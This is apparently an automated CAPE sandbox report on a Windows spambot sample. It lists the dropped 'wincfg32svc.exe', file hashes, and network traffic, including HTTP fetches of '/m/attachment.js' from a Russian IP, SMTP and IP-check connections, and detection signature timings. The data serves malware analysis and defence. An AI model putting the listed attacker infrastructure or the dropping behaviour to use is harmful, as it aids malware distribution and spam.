rasularulegafefoji xejalugivocifawi zaletexirubodoxuyebu damozigohaxafazenevidizaho
VS_VERSION_INFO
StringFileInfo
457aa56b
InternalName
howora.exe
ProductVersion
1.0.1.98
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


2019-01-08-spambot-malware.exe, PID: 2924, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe
Command Line: "C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe"
wincfg32svc.exe, PID: 2688, Parent PID: 2924
Full Path: C:\Windows\750547060050\wincfg32svc.exe
Command Line: C:\Windows\750547060050\wincfg32svc.exe

Hosts

Direct IP Country Name
N 98.136.101.117 United States
Y 92.63.197.48 Russian Federation
Y 8.8.8.8 United States
N 147.75.40.2 United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49170 147.75.40.2 icanhazip.com 80
192.168.35.21 49169 92.63.197.48 80
192.168.35.21 49171 92.63.197.48 80
192.168.35.21 49172 92.63.197.48 80
192.168.35.21 49173 92.63.197.48 80
192.168.35.21 49174 92.63.197.48 80
192.168.35.21 49175 92.63.197.48 80
192.168.35.21 49176 92.63.197.48 80
192.168.35.21 49177 92.63.197.48 80
192.168.35.21 49178 92.63.197.48 80
192.168.35.21 49179 92.63.197.48 80
192.168.35.21 49180 92.63.197.48 80
192.168.35.21 49168 98.136.101.117 mta5.am0.yahoodns.net 25

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
yahoo.com MX mta5.am0.yahoodns.net, MX mta7.am0.yahoodns.net, MX mta6.am0.yahoodns.net
mta5.am0.yahoodns.net A 66.218.85.139, A 74.6.137.64, A 98.136.101.117, A 67.195.228.141, A 67.195.229.59, A 98.137.159.24, A 98.137.159.28, A 66.218.85.52
icanhazip.com A 147.75.40.2

HTTP Requests

URI Data
http://92.63.197.48/m/attachment.js
GET /m/attachment.js HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://icanhazip.com/
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: icanhazip.com

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name wincfg32svc.exe
Associated Filenames
C:\Windows\750547060050\wincfg32svc.exe
File Size 159744 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 34a7433231c49fa349f75da7426ed65f
SHA1 72ebb653a8e3bccc4f019e2f5fbff5c8bb4e49ad
SHA256 4b9d5841d38b8658466dcaf409c34c0f6d2d1f9ecb64254391a4621465daf79b
CRC32 10875687
Ssdeep 1536:iUWCvW0XOVwp8OOzn5As9IQsOo1oUHnyoHOvM3D/ozfKiQUS80I8z57jQDzEBCq4:bW2WUOWG/z5ARQGrHbXUS7z57Co/Hg
ClamAV None
Yara None matched
CAPE Yara None matched
Sorry! No CAPE files.
Process Name 2019-01-08-spambot-malware.exe
PID 2924
Dump Size 27136 bytes
Module Path C:\Users\user\AppData\Local\Temp\2019-01-08-spambot-malware.exe
Type PE image: 32-bit executable
MD5 391dc54d66fdb1d9053c8e19d5a51483
SHA1 e3a18c085546573e4b8c8ba5a4424022d200ce28
SHA256 d780b3dd859388a0860d0eb5434569e75bca093ca162c071eb0dcb26cd834673
CRC32 01110BEF
Ssdeep 384:wPmHqQZyZzxTu4plLFhYZmt/x155ePWSG20F:hgZ9acjh+yX554820
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename d780b3dd859388a0860d0eb5434569e75bca093ca162c071eb0dcb26cd834673
Process Name wincfg32svc.exe
PID 2688
Dump Size 27136 bytes
Module Path C:\Windows\750547060050\wincfg32svc.exe
Type PE image: 32-bit executable
MD5 7518c6611326eadaf498c85bdb38fcb5
SHA1 d8c9f041e972509f5b6c3663c5807abdd52f7f26
SHA256 7db853e3588b40b0f2ebe2e8484ea2e73a924c6319cdada42a344d79b88e9f31
CRC32 3AEB226D
Ssdeep 384:wPmHqQZyZzxTu4plLFhYZmt/x155ePWSG2FFF:hgZ9acjh+yX55482b
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 7db853e3588b40b0f2ebe2e8484ea2e73a924c6319cdada42a344d79b88e9f31

Processing ( 47.961 seconds )

  • 45.872 BehaviorAnalysis
  • 0.706 Static
  • 0.644 CAPE
  • 0.206 Dropped
  • 0.206 TargetInfo
  • 0.15 ProcDump
  • 0.093 TrID
  • 0.033 Deduplicate
  • 0.032 NetworkAnalysis
  • 0.013 Strings
  • 0.004 AnalysisInfo
  • 0.001 Debug
  • 0.001 config_decoder

Signatures ( 21.844 seconds )

  • 4.894 antivm_generic_disk
  • 3.384 bootkit
  • 2.221 mimics_filetime
  • 1.798 decoy_document
  • 1.779 virus
  • 1.697 reads_self
  • 1.673 stealth_file
  • 1.536 hancitor_behavior
  • 1.535 api_spamming
  • 1.273 stealth_timeout
  • 0.009 antiav_detectreg
  • 0.004 persistence_autorun
  • 0.004 infostealer_ftp
  • 0.004 ransomware_files
  • 0.003 antiav_detectfile
  • 0.003 ransomware_extensions
  • 0.002 kovter_behavior
  • 0.002 antianalysis_detectreg
  • 0.002 modify_proxy
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.002 infostealer_mail
  • 0.001 tinba_behavior
  • 0.001 malicious_dynamic_function_loading
  • 0.001 rat_nanocore
  • 0.001 antiemu_wine_func
  • 0.001 infostealer_browser_password
  • 0.001 dynamic_function_loading
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway

Reporting ( 0.013 seconds )

  • 0.012 SubmitCAPE
  • 0.001 CompressResults
Task ID 29474
Mongo ID 5c369db4f28488708c44d989
Cuckoo release 1.3-CAPE